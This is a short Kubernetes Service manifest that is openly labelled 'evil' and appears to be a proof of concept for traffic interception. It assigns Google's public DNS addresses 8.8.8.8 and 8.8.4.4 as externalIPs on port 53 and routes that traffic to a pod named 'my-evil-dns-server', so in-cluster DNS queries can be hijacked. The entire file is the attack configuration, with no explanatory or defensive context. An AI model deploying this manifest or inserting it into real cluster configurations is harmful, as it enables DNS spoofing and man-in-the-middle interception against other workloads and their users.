service.yaml
apiVersion: v1
kind: Service
metadata:
  name: my-evil-service
  namespace: my-evil-namespace
spec:
  selector:
    app: my-evil-dns-server
  ports:
    - name: dns
      protocol: UDP
      port: 53
      targetPort: 9053
  externalIPs:
    - 8.8.8.8
    - 8.8.4.4
